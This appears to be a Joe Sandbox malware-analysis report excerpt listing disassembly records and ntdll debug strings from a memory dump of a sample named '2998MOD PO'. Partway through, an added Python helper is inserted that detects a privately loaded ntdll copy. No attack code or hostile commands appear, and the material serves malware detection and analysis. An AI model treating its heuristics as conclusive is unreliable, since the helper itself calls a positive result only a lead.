                          • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                          • API String ID: 0-2160512332
                          • Opcode ID: d32edf0c789a39f536192ccd4418bc6b7481a18f2f965b355670652ee0657403
                          • Instruction ID: 37d749f5caca1e2b47d3fcccef930c75c7e82d275f672e853a29d513f2c50aed
                          • Opcode Fuzzy Hash: d32edf0c789a39f536192ccd4418bc6b7481a18f2f965b355670652ee0657403
                          • Instruction Fuzzy Hash: 83929371604742AFE722CF18D884B6BB7E8BF84750F04492EFA98D7291D770E944CB92
                          Strings
                          • Critical section address, xrefs: 019F5425, 019F54BC, 019F5534
                          • Critical section address., xrefs: 019F5502
                          • Critical section debug info address, xrefs: 019F541F, 019F552E
                          • corrupted critical section, xrefs: 019F54C2
                          • 8, xrefs: 019F52E3
                          • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 019F54CE
                          • Address of the debug info found in the active list., xrefs: 019F54AE, 019F54FA
                          • Invalid debug info address of this critical section, xrefs: 019F54B6
                          • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 019F54E2
                          • double initialized or corrupted critical section, xrefs: 019F5508
                          • Thread identifier, xrefs: 019F553A
                          • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 019F540A, 019F5496, 019F5519
                          • Thread is in a state in which it cannot own a critical section, xrefs: 019F5543
                          • undeleted critical section in freed memory, xrefs: 019F542B
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                          • API String ID: 0-2368682639
                          • Opcode ID: 012eb136ea4c6fbcbb23cf99b1a66e6afa765118bbe1f27ed00b4375cf336b03
                          • Instruction ID: 7274dc9c11a1acd752ceb46e078bd0cfb8f6570b86728fe850456f77672520cf
                          • Opcode Fuzzy Hash: 012eb136ea4c6fbcbb23cf99b1a66e6afa765118bbe1f27ed00b4375cf336b03
                          • Instruction Fuzzy Hash: 24816CB1A40348EFEB20CF99C945FAEBBB9BB48B14F11415DE608B7641D3B1A941CB60
                          Strings
                          • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 019F2506
                          • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 019F2409
                          • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 019F22E4
                          • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 019F24C0
                          • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 019F25EB
                          • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 019F2498
                          • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 019F2602
                          • RtlpResolveAssemblyStorageMapEntry, xrefs: 019F261F
                          • @, xrefs: 019F259B
                          • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 019F2624
                          • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 019F2412
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                          • API String ID: 0-4009184096
                          • Opcode ID: d3c6f0843c299f01fddce65fbd03a2408cf78dc5711f971662b34df57878d565
                          • Instruction ID: 364992b69eb9185764814df1bce43806985bf5ee91b2a315883ebb3aeed14720
                          • Opcode Fuzzy Hash: d3c6f0843c299f01fddce65fbd03a2408cf78dc5711f971662b34df57878d565
                          • Instruction Fuzzy Hash: 50026FF1D04229ABDB31DB54CD80BD9B7B8EB54704F4045EAA70DA7241EB70AE84CF69
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                          • API String ID: 0-2515994595
                          • Opcode ID: 14cbc5ec21a771b1293662917c6c8acb48094b38d3c7304ed5be7e68a95e887c
                          • Instruction ID: 89f05b562c982c835ddf52eb93758a7443dfed817d88dc5a79b04fb3d3f33446
                          • Opcode Fuzzy Hash: 14cbc5ec21a771b1293662917c6c8acb48094b38d3c7304ed5be7e68a95e887c
                          • Instruction Fuzzy Hash: 9751BD715043219BC729DF5CC884BABBBE8EFD4650F54492DFA99C3241E778D608CB92
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                          • API String ID: 0-1700792311
                          • Opcode ID: 8d66dd0a9875a3cce8f874eadf886b33bb27b709035a887e8247c586bf838877
                          • Instruction ID: 05e6bdf080efa810055a6d9e8321e5f12c5d40de61d60792208343e0a1fff95f
                          • Opcode Fuzzy Hash: 8d66dd0a9875a3cce8f874eadf886b33bb27b709035a887e8247c586bf838877
                          • Instruction Fuzzy Hash: 91D1DE36600686DFDB22DF68C940BAEBBF1FFC9714F188059F48A9B252C7349A41CB54
                          Strings
                          • AVRF: -*- final list of providers -*- , xrefs: 01A08B8F
                          • HandleTraces, xrefs: 01A08C8F
                          • VerifierDlls, xrefs: 01A08CBD
                          • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01A08A3D
                          • VerifierFlags, xrefs: 01A08C50
                          • VerifierDebug, xrefs: 01A08CA5
                          • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01A08A67
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                          • API String ID: 0-3223716464
                          • Opcode ID: 6bac0ab5fe5147dc4af8e98667a53ebc0353f083a5a547f8c0c10cfeb365439d
                          • Instruction ID: ea4ec48ab5ce28d39c6e402ace289ff2e26b0154d2cf950491fbed341f4b7856
                          • Opcode Fuzzy Hash: 6bac0ab5fe5147dc4af8e98667a53ebc0353f083a5a547f8c0c10cfeb365439d
                          • Instruction Fuzzy Hash: 48912571E01712AFD723EF68EC80B6B77B8AF94714F050518FA496B281C738AD05CB99
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                          • API String ID: 0-1109411897
                          • Opcode ID: d17794a1372e6af01c2ad02604847a479690b87928bbaabc72ae25ed9acdd597
                          • Instruction ID: 5f06398c78399f5350eaf14990483944362d5b18df2bc77b1fc66cc4ceaa7a61
                          • Opcode Fuzzy Hash: d17794a1372e6af01c2ad02604847a479690b87928bbaabc72ae25ed9acdd597
                          • Instruction Fuzzy Hash: 76A25974A0562A8FDB65EF18CD98BA9BBF5BF45704F1442E9D90DA7290DB309E81CF00
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                          • API String ID: 0-792281065
                          • Opcode ID: 12d3ac471363c3eb7108979079d4fba5e4d54a50b5337bf1913c3b8dc7dc2fb7
                          • Instruction ID: 0dceb77e734a829f4e04c83add54a97900ded4322b0398d0e1aabbf7c15416d4
                          • Opcode Fuzzy Hash: 12d3ac471363c3eb7108979079d4fba5e4d54a50b5337bf1913c3b8dc7dc2fb7
                          • Instruction Fuzzy Hash: E5916D35B01715ABEB35DF18DD84FEA7BAABF90B25F04012CD60C6B281D778A902C791
                          Strings
                          • minkernel\ntdll\ldrinit.c, xrefs: 019D9A11, 019D9A3A
                          • Getting the shim engine exports failed with status 0x%08lx, xrefs: 019D9A01
                          • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 019D9A2A
                          • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 019D99ED
                          • LdrpInitShimEngine, xrefs: 019D99F4, 019D9A07, 019D9A30
                          • apphelp.dll, xrefs: 01976496
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                          • API String ID: 0-204845295
                          • Opcode ID: 2e0ac6326c5b31338a459928eb49476d7cedd70502a4a2bde7b9069054b62db4
                          • Instruction ID: 6a928f8522de30c1ef636d3fe7b2a93600abd8dd765eb095c6051616943fdd3b
                          • Opcode Fuzzy Hash: 2e0ac6326c5b31338a459928eb49476d7cedd70502a4a2bde7b9069054b62db4
                          • Instruction Fuzzy Hash: 785190726087059BE721EF24C891FABB7E8EFC4648F01491DE58D9B1A0D630EA05CB93
                          Strings
                          • minkernel\ntdll\ldrredirect.c, xrefs: 019F8181, 019F81F5
                          • Loading import redirection DLL: '%wZ', xrefs: 019F8170
                          • LdrpInitializeImportRedirection, xrefs: 019F8177, 019F81EB
                          • Unable to build import redirection Table, Status = 0x%x, xrefs: 019F81E5
                          • minkernel\ntdll\ldrinit.c, xrefs: 019BC6C3
                          • LdrpInitializeProcess, xrefs: 019BC6C4
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                          • API String ID: 0-475462383
                          • Opcode ID: 49d2d2c9b4c04e924df0415a82ce8e4a6a522f6e09463e563dfad1665e89059d
                          • Instruction ID: c0ff38794e8368bd11d1389d4490447fca3c0a7789a44ab4e6efdbb3b45b3c78
                          • Opcode Fuzzy Hash: 49d2d2c9b4c04e924df0415a82ce8e4a6a522f6e09463e563dfad1665e89059d
                          • Instruction Fuzzy Hash: E631F571744706ABD214EF28DD86E6A7798FFD4B10F05051CF94CAB291E620ED05C7A2
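Every record above comes from the same dumped region (Source File base 0000000001950000, "based on PE: true"), and the strings it lists (minkernel\ntdll\ldrinit.c, LdrpInitializeProcess, LdrpInitializeImportRedirection, RtlGetAssemblyStorageRoot, HEAP[%wZ]: ) are ntdll-internal debug strings rather than anything a .NET sample would carry itself. The following triage helper is an added example, not part of the Joe Sandbox report or of the sample: it decodes a dump file name of the form shown in the records and checks a region's bytes for those ntdll markers. It assumes the field layout of the .sdmp name (process index, dump number, run id, base address, page protection, allocation state, allocation type); the PAGE_*, MEM_COMMIT and MEM_PRIVATE values themselves are the winnt.h constants. The byte buffer it scans is constructed inline for illustration.

```python
"""Triage a Joe Sandbox memory-dump record for a privately mapped ntdll copy.

Added example. The .sdmp field layout below is an assumption about Joe Sandbox's
naming convention; the memory constants are the documented winnt.h values.
"""
import re
from dataclasses import dataclass

# winnt.h memory constants (exact values).
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
MEM_STATE = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x10000: "MEM_FREE"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

# ANSI debug strings that are specific to ntdll; all of them appear in the report above.
NTDLL_MARKERS = [
    b"minkernel\\ntdll\\ldrinit.c",
    b"minkernel\\ntdll\\ldrredirect.c",
    b"LdrpInitializeProcess",
    b"RtlGetAssemblyStorageRoot",
    b"HEAP[%wZ]: ",
]

# Assumed layout: proc.dump.run.base.protect.state.type.extra.sdmp (hex fields).
SDMP_RE = re.compile(
    r"^(?P<proc>[0-9A-Fa-f]{8})\.(?P<dump>[0-9A-Fa-f]{8})\.(?P<run>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\."
    r"(?P<state>[0-9A-Fa-f]{8})\.(?P<type>[0-9A-Fa-f]{8})\."
    r"(?P<extra>[0-9A-Fa-f]{8})\.sdmp$"
)


@dataclass
class DumpRegion:
    process_index: int
    base: int
    protect: str
    state: str
    mem_type: str


def parse_sdmp_name(name):
    """Decode the region metadata encoded in a Joe Sandbox .sdmp file name."""
    m = SDMP_RE.match(name)
    if not m:
        raise ValueError(f"not a Joe Sandbox sdmp name: {name}")
    protect = int(m["protect"], 16)
    state = int(m["state"], 16)
    mem_type = int(m["type"], 16)
    # Mask off PAGE_GUARD / PAGE_NOCACHE style modifier bits before the lookup.
    base_protect = protect & 0xFF
    return DumpRegion(
        process_index=int(m["proc"], 16),
        base=int(m["base"], 16),
        protect=PAGE_PROTECT.get(base_protect, hex(protect)),
        state=MEM_STATE.get(state, hex(state)),
        mem_type=MEM_TYPE.get(mem_type, hex(mem_type)),
    )


def ntdll_markers_found(region_bytes):
    """Return the ntdll-specific debug strings present in a dumped region."""
    return [m.decode() for m in NTDLL_MARKERS if m in region_bytes]


def looks_like_private_ntdll_copy(region, markers):
    """Executable, privately allocated memory carrying ntdll's own strings:
    a second ntdll that is not backed by the ntdll image mapping."""
    return (region.mem_type == "MEM_PRIVATE"
            and region.protect.startswith("PAGE_EXECUTE")
            and len(markers) >= 2)


# Constructed sample: a PE-looking header followed by three of the marker strings.
SAMPLE_REGION = (b"MZ\x90\x00" + b"\x00" * 60
                 + b"\x00".join([NTDLL_MARKERS[0], NTDLL_MARKERS[2], NTDLL_MARKERS[4]]))
SAMPLE_NAME = ("00000004.00000002.2041370277.0000000001950000"
               ".00000040.00001000.00020000.00000000.sdmp")

if __name__ == "__main__":
    region = parse_sdmp_name(SAMPLE_NAME)
    found = ntdll_markers_found(SAMPLE_REGION)
    print(region, found, looks_like_private_ntdll_copy(region, found))
```

A positive result is a lead, not a verdict: confirm it by comparing the region base with the ntdll entry in the process's loaded-module list, since the system ntdll is mapped as MEM_IMAGE while a copy the sample loads itself lives in private memory.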
                          Strings
                          • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 019F2180
                          • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 019F219F
                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 019F21BF
                          • RtlGetAssemblyStorageRoot, xrefs: 019F2160, 019F219A, 019F21BA
                          • SXS: %s() passed the empty activation context, xrefs: 019F2165
                          • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 019F2178
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                          • API String ID: 0-861424205
                          • Opcode ID: 8543d281e34cb3e2c25b2d2ff305da65cf9c23b932c1220fdf533db60293a622
                          • Instruction ID: 762c0a9e5985756d08dbadae7cfbd3b9ceca91e67c0c6174dec066392d3b2fca
                          • Opcode Fuzzy Hash: 8543d281e34cb3e2c25b2d2ff305da65cf9c23b932c1220fdf533db60293a622
                          • Instruction Fuzzy Hash: 3431E23AB402157BE7218BDA8DC5FAA7B6CEBA5A54F05005DBB0CB7240D270FE01C7A5
                          APIs
                            • Part of subcall function 019C2DF0: LdrInitializeThunk.NTDLL ref: 019C2DFA
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 019C0BA3
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 019C0BB6
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 019C0D60
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 019C0D74
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                          • String ID:
                          • API String ID: 1404860816-0
                          • Opcode ID: 82ba43dedcfbaa5ee7b38e9cc119a1715defbb89a4096f35b36fe0c5562c7603
                          • Instruction ID: f7f72467e1653e292d1027f587913c3619f482d1a649b817c4ad94a131d83f30
                          • Opcode Fuzzy Hash: 82ba43dedcfbaa5ee7b38e9cc119a1715defbb89a4096f35b36fe0c5562c7603
                          • Instruction Fuzzy Hash: 3A424A75900715DFDB21CF28C880BAAB7F9BF44714F1445ADEA8DAB241E770AA84CF61
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                          • API String ID: 0-379654539
                          • Opcode ID: 21a0efa0b17c411f5a0b5c63512c30d1a16b6cff9248ab126eb7c52bf2e951ac
                          • Instruction ID: 52bb3a57f8029428d1781bd91a7af89609decb03e6519d047ee48078437f80c4
                          • Opcode Fuzzy Hash: 21a0efa0b17c411f5a0b5c63512c30d1a16b6cff9248ab126eb7c52bf2e951ac
                          • Instruction Fuzzy Hash: 59C19E71508382CFD712EF68C044B6AB7E8FF84704F04486EF9999B251E738CA45CB62
                          Strings
                          • LdrpInitializeProcess, xrefs: 019B8422
                          • minkernel\ntdll\ldrinit.c, xrefs: 019B8421
                          • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 019B855E
                          • @, xrefs: 019B8591
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                          • API String ID: 0-1918872054
                          • Opcode ID: 8c839011bea4d0c243a359dbe3e9a6584e374f1274c63c2c8e8103fdfd60f66b
                          • Instruction ID: de5f9966885071bf5562365ed4a33bee676a4cf2f4310056bc96997a7c1f2f41
                          • Opcode Fuzzy Hash: 8c839011bea4d0c243a359dbe3e9a6584e374f1274c63c2c8e8103fdfd60f66b
                          • Instruction Fuzzy Hash: 29916D71508345AFE721DF65CD80FABBAECBB88744F40092EFA8C96151E774D9448B52
                          Strings
                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 019F22B6
                          • .Local, xrefs: 019B28D8
                          • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 019F21D9, 019F22B1
                          • SXS: %s() passed the empty activation context, xrefs: 019F21DE
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                          • API String ID: 0-1239276146
                          • Opcode ID: c46fadc0250293fd537d7d69dd384f10a214853cb19576e38bd2dd53b5b7530c
                          • Instruction ID: 3bff4b7f52566251402f2d5ba067c8b89e84e159fe5af7314eee01af842e0263
                          • Opcode Fuzzy Hash: c46fadc0250293fd537d7d69dd384f10a214853cb19576e38bd2dd53b5b7530c
                          • Instruction Fuzzy Hash: 7BA1AF359002299BDB25CF68C9C4BE9B7B9FF58354F1445E9D90CAB251D730AE81CF90
                          Strings
                          • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 019F3456
                          • SXS: %s() called with invalid flags 0x%08lx, xrefs: 019F342A
                          • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 019F3437
                          • RtlDeactivateActivationContext, xrefs: 019F3425, 019F3432, 019F3451
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                          • API String ID: 0-1245972979
                          • Opcode ID: 6ad427a6a981eec6ecf133223410cb0e80e97f3eac58b76c2d71f6b5f8d535b8
                          • Instruction ID: 111a3e391329bb133f64ec4a5d96d78322a1df4efd885169d2bc163cfedd9f38
                          • Opcode Fuzzy Hash: 6ad427a6a981eec6ecf133223410cb0e80e97f3eac58b76c2d71f6b5f8d535b8
                          • Instruction Fuzzy Hash: BE612532600712ABD722CF1DC981B6AB7E9FF90F51F15851DEA5E9B282C734E901CB91
                          Strings
                          • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 019E0FE5
                          • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 019E1028
                          • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 019E106B
                          • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 019E10AE
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                          • API String ID: 0-1468400865
                          • Opcode ID: 9d9e86d6c28c57d54ff8dbcafc8246b92529647185906a575267c9caadabc4c2
                          • Instruction ID: 8cd8883db6c413cd1dc7866ba5dbbb2856f4b9cc58268161a88b096736ef6aa6
                          • Opcode Fuzzy Hash: 9d9e86d6c28c57d54ff8dbcafc8246b92529647185906a575267c9caadabc4c2
                          • Instruction Fuzzy Hash: F971AFB19043059FDB21EF18C885F9B7FA8AF95764F440868F94C8B246D774D588CBE2
                          Strings
                          • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 019EA992
                          • minkernel\ntdll\ldrinit.c, xrefs: 019EA9A2
                          • LdrpDynamicShimModule, xrefs: 019EA998
                          • apphelp.dll, xrefs: 019A2462
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                          • API String ID: 0-176724104
                          • Opcode ID: 3d8a5d3f969c2b8dfeabe5726e9d5537d63bb47169c9038c1b2671248c902df2
                          • Instruction ID: 8215146ea74abbb66d6bb25b3ae94ccf97edcaf0c829eb7b8b283b92e1b2f589
                          • Opcode Fuzzy Hash: 3d8a5d3f969c2b8dfeabe5726e9d5537d63bb47169c9038c1b2671248c902df2
                          • Instruction Fuzzy Hash: 31312879A00301ABDB32DF5DDC49EAAB7F9FFC4B00F160019E90867265C7749A46C780
                          Strings
                          • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0199327D
                          • HEAP: , xrefs: 01993264
                          • HEAP[%wZ]: , xrefs: 01993255
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                          • API String ID: 0-617086771
                          • Opcode ID: 2287c9093f948bc318e9026c11013fac7ca4310e956e2ca6eea03648ad12d673
